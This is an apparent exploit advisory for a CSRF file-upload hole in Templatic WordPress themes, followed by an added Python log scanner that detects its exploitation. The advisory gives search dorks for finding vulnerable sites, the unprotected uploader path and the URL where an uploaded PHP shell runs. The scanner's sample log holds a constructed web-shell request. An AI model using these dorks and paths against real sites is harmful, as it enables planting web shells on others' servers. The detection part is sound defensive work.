Wednesday, September 14, 2016

Wordpress Templatic Themes CSRF File Upload Vulnerability

#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]

#Author : mdhaxor

#Category : Web Applications

#Type : PHP

#Vendor : http://templatic.com/


#Download : http://templatic.com/wordpress-themes-store/

#Tested : Mozilla, Chrome, Opera -> Windows & Linux

#Vulnerability : CSRF (file upload)


#DORK :

inurl:/wp-content/themes/Realestate/


inurl:/wp-content/themes/dailydeal/

inurl:/wp-content/themes/nightlife/

inurl:/wp-content/themes/5star/


inurl:/wp-content/themes/specialist/


CSRF File Upload Vulnerability



Exploit & POC : http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php

The Monetize uploader accepts a file POST at this path without any anti-CSRF token, so a form hosted on an attacker's page can submit the upload through a visitor's browser.




File Access :

http://site-target/wp-content/themes/Realestate/images/tmp/your_shell.php

The upload lands in the theme's images/tmp/ directory, which is web-reachable, so an uploaded .php file is served and executed from there.


Note : make sure the theme path in your CSRF script matches the dork you used (replace Realestate with dailydeal, nightlife, 5star or specialist as appropriate).
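For defenders, the two paths above are the whole signature of an attack: a POST to the Monetize uploader that arrives with an off-site Referer (the CSRF page), followed by a GET to a .php file under images/tmp/ that returns 200. The script below is an added example, not part of the advisory, that runs that check over Combined Log Format lines. The log lines and the host names example.org and attacker.invalid are constructed for the demonstration; the regexes use only the paths and theme names the advisory lists.

```python
"""Detect exploitation of the Templatic Monetize uploader in web server logs.

Added example (not from the advisory). Flags:
 (1) POSTs to .../Monetize/general/upload-file.php whose Referer is off-site,
     the request a CSRF page produces. A missing Referer is only a weak signal
     (browsers strip it in some form posts), so it is reported separately.
 (2) GETs to .../images/tmp/<name>.php that return 200, i.e. an uploaded PHP
     file being executed.
"""
import re
from urllib.parse import urlsplit

# Theme directories named in the advisory's dorks; all ship the Monetize uploader.
TEMPLATIC_THEMES = ("realestate", "dailydeal", "nightlife", "5star", "specialist")

UPLOAD_RE = re.compile(
    r"^/wp-content/themes/(?P<theme>[^/]+)/Monetize/general/upload-file\.php$", re.I)
TMP_PHP_RE = re.compile(
    r"^/wp-content/themes/(?P<theme>[^/]+)/images/tmp/(?P<file>[^/]+\.php[0-9]*)$", re.I)

# Apache/nginx "combined" format:
#   ip ident user [ts] "METHOD target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Constructed sample log (not real traffic). example.org is the WordPress site.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Sep/2016:10:01:02 +0000] "GET /wp-content/themes/Realestate/style.css HTTP/1.1" 200 5120 "http://example.org/" "Mozilla/5.0"
198.51.100.5 - - [14/Sep/2016:10:02:10 +0000] "POST /wp-content/themes/Realestate/Monetize/general/upload-file.php HTTP/1.1" 200 312 "http://attacker.invalid/csrf.html" "Mozilla/5.0"
203.0.113.9 - - [14/Sep/2016:10:02:35 +0000] "GET /wp-content/themes/Realestate/images/tmp/your_shell.php?cmd=id HTTP/1.1" 200 88 "-" "curl/7.50"
203.0.113.9 - - [14/Sep/2016:10:02:36 +0000] "GET /wp-content/themes/Realestate/images/tmp/missing.php HTTP/1.1" 404 12 "-" "curl/7.50"
198.51.100.6 - - [14/Sep/2016:10:05:00 +0000] "POST /wp-content/themes/dailydeal/Monetize/general/upload-file.php HTTP/1.1" 200 310 "http://example.org/wp-admin/" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = urlsplit(rec["target"]).path   # drop the query string
    return rec


def scan(lines, site_host):
    """Return a list of finding dicts in log order."""
    findings = []
    uploader_hit = set()   # themes whose uploader has received a POST so far
    site_host = site_host.lower()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        m = UPLOAD_RE.match(rec["path"])
        if m and rec["method"] == "POST":
            theme = m.group("theme").lower()
            uploader_hit.add(theme)
            ref_host = (urlsplit(rec["referer"]).hostname or "").lower()
            if ref_host and ref_host != site_host:
                kind = "csrf_upload"          # form submitted from another origin
            elif not ref_host:
                kind = "upload_no_referer"    # weak signal: Referer absent or "-"
            else:
                kind = "upload_same_origin"   # legitimate use looks like this too
            findings.append({"kind": kind, "ip": rec["ip"], "theme": theme,
                             "known_theme": theme in TEMPLATIC_THEMES,
                             "ts": rec["ts"], "referer": rec["referer"]})
            continue
        m = TMP_PHP_RE.match(rec["path"])
        if m and rec["status"] == "200":
            theme = m.group("theme").lower()
            # In a CSRF attack the POST comes from the victim's browser and the
            # GET from the attacker, so correlate on theme, not on client IP.
            findings.append({"kind": "php_in_tmp_executed", "ip": rec["ip"],
                             "theme": theme, "ts": rec["ts"], "file": m.group("file"),
                             "uploader_hit_before": theme in uploader_hit})
    return findings


def scan_sample():
    """Run the scan over the constructed sample log."""
    return scan(SAMPLE_LOG.splitlines(), "example.org")


if __name__ == "__main__":
    for f in scan_sample():
        print(f)
```

On the sample, the scan reports the off-site POST to the Realestate uploader as csrf_upload, the 200 for your_shell.php as php_in_tmp_executed with uploader_hit_before set, and the wp-admin-referred dailydeal POST as upload_same_origin; the 404 probe is ignored. Any 200 for a .php file under images/tmp/ deserves a look on its own, since the directory is meant to hold images.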


That's all.
